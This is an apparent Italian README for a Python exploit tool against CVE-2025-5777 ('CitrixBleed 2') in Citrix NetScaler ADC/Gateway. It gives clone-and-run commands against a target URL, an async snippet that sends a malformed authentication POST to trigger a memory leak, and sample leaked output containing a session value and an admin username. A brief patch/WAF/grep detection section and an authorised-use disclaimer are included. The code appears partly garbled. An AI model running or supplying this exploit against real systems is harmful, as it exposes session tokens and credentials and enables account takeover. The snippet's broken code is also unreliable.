
CVE-2025-5777 Exploit di perdita di memoria di Citrix NetScaler (CitrixBleed 2)

Questo strumento dimostra CVE-2025-5777, una vulnerabilità critica di divulgazione della memoria nei dispositivi Citrix NetScaler ADC/Gateway. L'exploit espone contenuti sensibili della memoria tramite richieste di autenticazione malformate.
Caratteristiche principali:
✔ Rilevamento della perdita di memoria tramite parsing delle risposte XML
✔ Dump Hex+ASCII delle regioni di memoria esposte
✔ Formato di richiesta compatibile con Burp Suite
✔ Richieste asincrone per test efficienti


git clone https://github.com/bughuntar/CVE-2025-5777.git
cd CVE-2025-5777
pip install requests beautifulsoup4 aiohttp colorama
chmod +x citrix_memory_leak.py
python3 citrix_memory_leak.py https://target-netscaler.com
Output atteso:
+ [+] Memory leak detected!
--- Leaked Memory Hex Dump ---
00000000 73 65 73 73 69 6F 6E 3D 31 32 33 34 35 36 37 38 session=12345678
00000010 55 73 65 72 3A 20 61 64 6D 69 6E 00 00 00 00 00 User: admin.....
| Azione | Comando/Riferimento |
|---|---|
| Patch | Citrix Security Bulletin |
| Regola WAF | Block POST /p/u/doAuthentication.do with malformed params |
# Malformed request trigger
async def exploit(target):
async with aiohttp.post(
f"{target}/p/u/doAuthentication.do",
data="login", # Missing equals sign triggers leak
ssl=False
) as response:
await parse_leak(await response.read())
- Questo strumento è SOLO per test autorizzati.
- L'uso non autorizzato viola le leggi internazionali sulla cybersicurezza.
Disclaimer completo: DISCLAIMER.md
Autore: Professor the Hunter
| Rilevamento |
grep 'POST /p/u/doAuthentication.do' netscaler.log |